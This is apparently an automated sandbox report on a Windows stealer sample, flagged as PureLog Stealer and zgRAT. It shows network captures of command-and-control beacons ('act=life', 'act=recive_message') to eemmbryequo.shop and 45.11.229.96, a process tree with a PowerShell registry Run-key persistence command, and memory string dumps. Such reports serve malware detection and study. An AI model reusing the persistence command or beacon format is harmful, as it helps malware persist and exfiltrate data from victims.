                                Sep 19, 2024 02:29:00.701575041 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:29:00.701653957 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:29:00.706641912 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:29:03.842693090 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:29:03.847718000 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:29:03.847774982 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:29:03.852741003 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:29:04.171679974 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:29:04.217259884 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:29:04.313175917 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:29:04.315196037 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:29:04.320022106 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:29:04.320080996 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:29:04.324865103 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:29:09.686440945 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:29:09.691364050 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:29:09.691437960 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:29:09.696197987 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:29:10.033934116 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:29:10.103437901 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:29:10.176239014 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:29:10.177966118 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:29:10.182760000 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:29:10.182811975 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:29:10.187526941 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:29:14.065835953 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:29:14.073230982 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:29:14.073288918 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:29:14.078361988 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:29:14.455704927 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:29:14.498876095 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:29:14.650984049 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:29:14.651983976 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:29:14.656799078 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:29:14.657428980 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:29:14.662297964 CEST560014973045.11.229.96192.168.2.4
                                TimestampSource PortDest PortSource IPDest IP
                                Sep 19, 2024 02:25:09.896054029 CEST5200153192.168.2.41.1.1.1
                                Sep 19, 2024 02:25:10.023377895 CEST53520011.1.1.1192.168.2.4
                                Sep 19, 2024 02:26:03.587476015 CEST5872753192.168.2.41.1.1.1
                                Sep 19, 2024 02:26:03.602932930 CEST53587271.1.1.1192.168.2.4
                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                Sep 19, 2024 02:25:09.896054029 CEST192.168.2.41.1.1.10x1900Standard query (0)strompreis.ruA (IP address)IN (0x0001)false
                                Sep 19, 2024 02:26:03.587476015 CEST192.168.2.41.1.1.10x89a1Standard query (0)eemmbryequo.shopA (IP address)IN (0x0001)false
                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                Sep 19, 2024 02:25:10.023377895 CEST1.1.1.1192.168.2.40x1900No error (0)strompreis.ru45.11.229.96A (IP address)IN (0x0001)false
                                Sep 19, 2024 02:25:11.903234959 CEST1.1.1.1192.168.2.40x642fNo error (0)windowsupdatebg.s.llnwi.net87.248.204.0A (IP address)IN (0x0001)false
                                Sep 19, 2024 02:26:03.602932930 CEST1.1.1.1192.168.2.40x89a1No error (0)eemmbryequo.shop104.21.39.11A (IP address)IN (0x0001)false
                                Sep 19, 2024 02:26:03.602932930 CEST1.1.1.1192.168.2.40x89a1No error (0)eemmbryequo.shop172.67.142.26A (IP address)IN (0x0001)false
                                • eemmbryequo.shop
                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                0192.168.2.449740104.21.39.114432124C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                TimestampBytes transferredDirectionData
                                2024-09-19 00:26:04 UTC263OUTPOST /api HTTP/1.1
                                Connection: Keep-Alive
                                Content-Type: application/x-www-form-urlencoded
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                Content-Length: 8
                                Host: eemmbryequo.shop
                                2024-09-19 00:26:04 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                Data Ascii: act=life
                                2024-09-19 00:26:04 UTC549INHTTP/1.1 200 OK
                                Date: Thu, 19 Sep 2024 00:26:04 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: close
                                X-Frame-Options: SAMEORIGIN
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=D%2BEvuywMs9sndEA3gzUkXYZrAucZ9f%2FWdPYLXkkHr%2BvHO6eOeJlG%2BMvtM69obGB4BHVbBw5fGM4EGIhjJsz6R6WmN8eCjqHl7HPCWu79AJRURHjpoHm%2B8xei1BiIBqLJr5Xa"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Server: cloudflare
                                CF-RAY: 8c5571304bb342ac-EWR
                                2024-09-19 00:26:04 UTC820INData Raw: 31 31 32 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                Data Ascii: 112d<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                2024-09-19 00:26:04 UTC1369INData Raw: 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b 69 65
                                Data Ascii: .errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie
                                2024-09-19 00:26:04 UTC1369INData Raw: 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 61 41 6f 78 44 6b 41 4d 57 6e 5f 4c 66 6f 63 5f 62 47 48 72 73 41 48 42 59 6d 6f 38 44 33 35 56 4b 6b 41 70 6e 2e 61 4b 54 58 77 2d 31 37 32 36 37 30 35 35 36 34 2d 30 2e 30 2e 31 2e 31 2d 2f 61 70 69 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c
                                Data Ascii: <input type="hidden" name="atok" value="aAoxDkAMWn_Lfoc_bGHrsAHBYmo8D35VKkApn.aKTXw-1726705564-0.0.1.1-/api"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" styl
                                2024-09-19 00:26:04 UTC847INData Raw: 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 61 3e 3c
                                Data Ascii: hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflare</a><
                                2024-09-19 00:26:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                1192.168.2.449741104.21.39.114432124C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                TimestampBytes transferredDirectionData
                                2024-09-19 00:26:04 UTC353OUTPOST /api HTTP/1.1
                                Connection: Keep-Alive
                                Content-Type: application/x-www-form-urlencoded
                                Cookie: __cf_mw_byp=aAoxDkAMWn_Lfoc_bGHrsAHBYmo8D35VKkApn.aKTXw-1726705564-0.0.1.1-/api
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                Content-Length: 74
                                Host: eemmbryequo.shop
                                2024-09-19 00:26:04 UTC74OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 68 76 30 66 52 75 2d 2d 26 6a 3d 62 34 66 30 31 37 37 37 65 64 63 38 35 31 61 61 34 37 62 64 64 62 30 31 61 35 62 39 34 32 66 37
                                Data Ascii: act=recive_message&ver=4.0&lid=hv0fRu--&j=b4f01777edc851aa47bddb01a5b942f7
                                2024-09-19 00:26:05 UTC800INHTTP/1.1 200 OK
                                Date: Thu, 19 Sep 2024 00:26:05 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: close
                                Set-Cookie: PHPSESSID=5t3h3s9tpvjpj9mgojjp6tbq80; expires=Sun, 12 Jan 2025 18:12:44 GMT; Max-Age=9999999; path=/
                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                Cache-Control: no-store, no-cache, must-revalidate
                                Pragma: no-cache
                                CF-Cache-Status: DYNAMIC
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VibaB1JJBM%2FGCBUpOu%2FfmUwtm9WqJAsR7A9OipI7LepzCgYdvezByTMw86E0tcFavWkZpUAieS91uM8QPDCUm0CZBBAk6m1V9XC4quR%2BenwU3uFJwV9Kbhkj49%2FA%2FkbAfxSa"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Server: cloudflare
                                CF-RAY: 8c557134b8d80f7c-EWR
                                alt-svc: h3=":443"; ma=86400
                                2024-09-19 00:26:05 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                Data Ascii: aerror #D12
                                2024-09-19 00:26:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0


                                Click to jump to process

                                Click to jump to process

                                Click to dive into process behavior distribution

                                Click to jump to process

                                Target ID:0
                                Start time:20:25:03
                                Start date:18/09/2024
                                Path:C:\Users\user\Desktop\57lklPjdPc.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\57lklPjdPc.exe"
                                Imagebase:0xd30000
                                File size:352'768 bytes
                                MD5 hash:C164ED9887BD51CBA150379514DC4E81
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.4208692705.000000000457C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: 00000000.00000002.4219277118.0000000006E40000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.4219277118.0000000006E40000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: MALWARE_Win_zgRAT, Description: Detects zgRAT, Source: 00000000.00000002.4219277118.0000000006E40000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.4208692705.00000000043C4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                Reputation:low
                                Has exited:false

                                Target ID:1
                                Start time:20:25:03
                                Start date:18/09/2024
                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):true
                                Commandline:"powershell.exe" Remove-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name '57lklPjdPc';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name '57lklPjdPc' -Value '"C:\Users\user\AppData\Roaming\57lklPjdPc.exe"' -PropertyType 'String'
                                Imagebase:0x4f0000
                                File size:433'152 bytes
                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:2
                                Start time:20:25:03
                                Start date:18/09/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff7699e0000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:3
                                Start time:20:25:16
                                Start date:18/09/2024
                                Path:C:\Users\user\AppData\Roaming\57lklPjdPc.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\AppData\Roaming\57lklPjdPc.exe"
                                Imagebase:0x830000
                                File size:352'768 bytes
                                MD5 hash:C164ED9887BD51CBA150379514DC4E81
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Antivirus matches:
                                • Detection: 100%, Avira
                                • Detection: 100%, Joe Sandbox ML
                                • Detection: 58%, ReversingLabs
                                • Detection: 62%, Virustotal, Browse
                                Reputation:low
                                Has exited:true

                                Target ID:7
                                Start time:20:25:24
                                Start date:18/09/2024
                                Path:C:\Users\user\AppData\Roaming\57lklPjdPc.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\AppData\Roaming\57lklPjdPc.exe"
                                Imagebase:0x760000
                                File size:352'768 bytes
                                MD5 hash:C164ED9887BD51CBA150379514DC4E81
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:low
                                Has exited:true

                                Target ID:8
                                Start time:20:25:56
                                Start date:18/09/2024
                                Path:C:\Windows\SysWOW64\cmd.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\XgrafwGYiYyF.bat" "
                                Imagebase:0x240000
                                File size:236'544 bytes
                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:9
                                Start time:20:25:56
                                Start date:18/09/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff7699e0000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:10
                                Start time:20:25:56
                                Start date:18/09/2024
                                Path:C:\Windows\SysWOW64\chcp.com
                                Wow64 process (32bit):true
                                Commandline:chcp 65001
                                Imagebase:0xe30000
                                File size:12'800 bytes
                                MD5 hash:20A59FB950D8A191F7D35C4CA7DA9CAF
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:moderate
                                Has exited:true

                                Target ID:11
                                Start time:20:25:56
                                Start date:18/09/2024
                                Path:C:\Windows\SysWOW64\PING.EXE
                                Wow64 process (32bit):true
                                Commandline:ping -n 5 localhost
                                Imagebase:0x270000
                                File size:18'944 bytes
                                MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:12
                                Start time:20:26:01
                                Start date:18/09/2024
                                Path:C:\Users\user\AppData\Roaming\l6E.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\AppData\Roaming\l6E.exe"
                                Imagebase:0x710000
                                File size:354'168 bytes
                                MD5 hash:FAC2188E4A28A0CF32BF4417D797B0F8
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Antivirus matches:
                                • Detection: 29%, ReversingLabs
                                • Detection: 54%, Virustotal, Browse
                                Reputation:low
                                Has exited:true

                                Target ID:13
                                Start time:20:26:01
                                Start date:18/09/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff7699e0000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:14
                                Start time:20:26:02
                                Start date:18/09/2024
                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                Imagebase:0xfa0000
                                File size:65'440 bytes
                                MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:17
                                Start time:20:26:04
                                Start date:18/09/2024
                                Path:C:\Windows\SysWOW64\WerFault.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2124 -s 1736
                                Imagebase:0x790000
                                File size:483'680 bytes
                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Reset < >
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4215802505.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c70000_57lklPjdPc.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: ,bq$4$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                  • API String ID: 0-312445597
                                  • Opcode ID: c1b8e0e16819cedf2c4402dcdf5e5d911b6217cba599c7b56547e0034186b0d1
                                  • Instruction ID: 2cd953a026c5f6e4a86cbcdc2ca8383d432c4baed29f971744649da6099cb3aa
                                  • Opcode Fuzzy Hash: c1b8e0e16819cedf2c4402dcdf5e5d911b6217cba599c7b56547e0034186b0d1
                                  • Instruction Fuzzy Hash: E2E23E34A0021CCFDB15DF95D994BAEBBB6FB88300F108599E909AB394DB349D85CF91
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4201173357.00000000030B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_30b0000_57lklPjdPc.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4'^q$Oi8($TJcq$TJcq$Te^q$pbq$xbaq
                                  • API String ID: 0-3066794041
                                  • Opcode ID: 61e6adbbac6020aeba882e70056d0e5c33c203873f99d769dff3a7945500c7ad
                                  • Instruction ID: 8f58d8686208bdb026e020b3900815494201ba55a8f5cc3a93a9c4d8e2562bd6
                                  • Opcode Fuzzy Hash: 61e6adbbac6020aeba882e70056d0e5c33c203873f99d769dff3a7945500c7ad
                                  • Instruction Fuzzy Hash: ED520335A001189FCB55DF68C984EA9BBB2FF89314F1585E8E549AB272CB31EC91CF40
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4215802505.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c70000_57lklPjdPc.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: ,bq$4$$^q$$^q$$^q$$^q
                                  • API String ID: 0-2546334966
                                  • Opcode ID: e7d44a912d3a7c530eede80230a922a02c52f0e56278c3a85d3cad045ead7c78
                                  • Instruction ID: 621041e9ec21abaf6717faca98b03aaee86e3210db86ffc7d4671b4f2a207d72
                                  • Opcode Fuzzy Hash: e7d44a912d3a7c530eede80230a922a02c52f0e56278c3a85d3cad045ead7c78
                                  • Instruction Fuzzy Hash: C5623F34A0021CCFDB55DFA5D994BAEB7B6FB88300F1084A9D909AB794DB349E81CF51
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4218665662.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6630000_57lklPjdPc.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4'^q$TJcq$TJcq$Te^q$pbq$xbaq
                                  • API String ID: 0-50452399
                                  • Opcode ID: 8bc6f78188a70cd12c73a96d3d87c33d5148d077ede16cbb743a64559b6d37d6
                                  • Instruction ID: 344bef35466f6b70586ebf3543e79d1c51a1c5036f111d72584d52150e8636f8
                                  • Opcode Fuzzy Hash: 8bc6f78188a70cd12c73a96d3d87c33d5148d077ede16cbb743a64559b6d37d6
                                  • Instruction Fuzzy Hash: C0521575A001289FDB55CF68C984E59BBB2FF89314F1581A8E51AEB272CB31EC91CB40
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4218665662.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6630000_57lklPjdPc.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: fcq$ fcq$4'^q
                                  • API String ID: 0-259698777
                                  • Opcode ID: a00827f0e7641790f8395fb6fe411be27d47c94b7740d0298427b41776c8fdfe
                                  • Instruction ID: 9461555b7934a2c707cfc4d4e1ae2140b0842d91db4f747f3e39f9248617274b
                                  • Opcode Fuzzy Hash: a00827f0e7641790f8395fb6fe411be27d47c94b7740d0298427b41776c8fdfe
                                  • Instruction Fuzzy Hash: 79E2EE347012498FC754EF25E5A5EEA73F7EF88304F5182AA940A9B3E4DA346D81CF85
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4218665662.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6630000_57lklPjdPc.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: fcq$ fcq$4'^q
                                  • API String ID: 0-259698777
                                  • Opcode ID: 018089d2a75fafdf4e435919c31d41cb35f5a1c509024d05fcf226651869ba70
                                  • Instruction ID: 7a3a277cf1a5da5e9f0bdbee7a005563701fa1daf8036e20ce5c48e628df514f
                                  • Opcode Fuzzy Hash: 018089d2a75fafdf4e435919c31d41cb35f5a1c509024d05fcf226651869ba70
                                  • Instruction Fuzzy Hash: ADE2EE347012498FC754EF25E5A5EEA73F7EF88304F5182AA940A9B3E4DA346D81CF85
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4201173357.00000000030B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_30b0000_57lklPjdPc.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4'^q$4'^q
                                  • API String ID: 0-2697143702
                                  • Opcode ID: dedf5da4fd9d2206ef24f07b1d14dcbe1c90b27291e3fbdf9503fb67623e8cb5
                                  • Instruction ID: c8e3b21605a312dd2c7e0cbfdb83a4a214108ad4810ba3d45c6395feb88fe42a
                                  • Opcode Fuzzy Hash: dedf5da4fd9d2206ef24f07b1d14dcbe1c90b27291e3fbdf9503fb67623e8cb5
                                  • Instruction Fuzzy Hash: 86615C70A012498FD709EF7BF94069ABBF3FBC8308B14C46AC444DB2A9EB7459858B51
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4201173357.00000000030B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_30b0000_57lklPjdPc.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4'^q$4'^q
                                  • API String ID: 0-2697143702
                                  • Opcode ID: e75d48521d865da68e349e5ee8594d2e1e74d98278091b4d8bf577efd58e292c
                                  • Instruction ID: 330e668ee54c6d75b6fae293a85c7aea0f60d9157de12318b73c297b5082caff
                                  • Opcode Fuzzy Hash: e75d48521d865da68e349e5ee8594d2e1e74d98278091b4d8bf577efd58e292c
                                  • Instruction Fuzzy Hash: BB615A70A012458FD709EF7BF98069ABBF3FBC8308B14C42AC4549B2A9EF745885CB51
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4201173357.00000000030B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
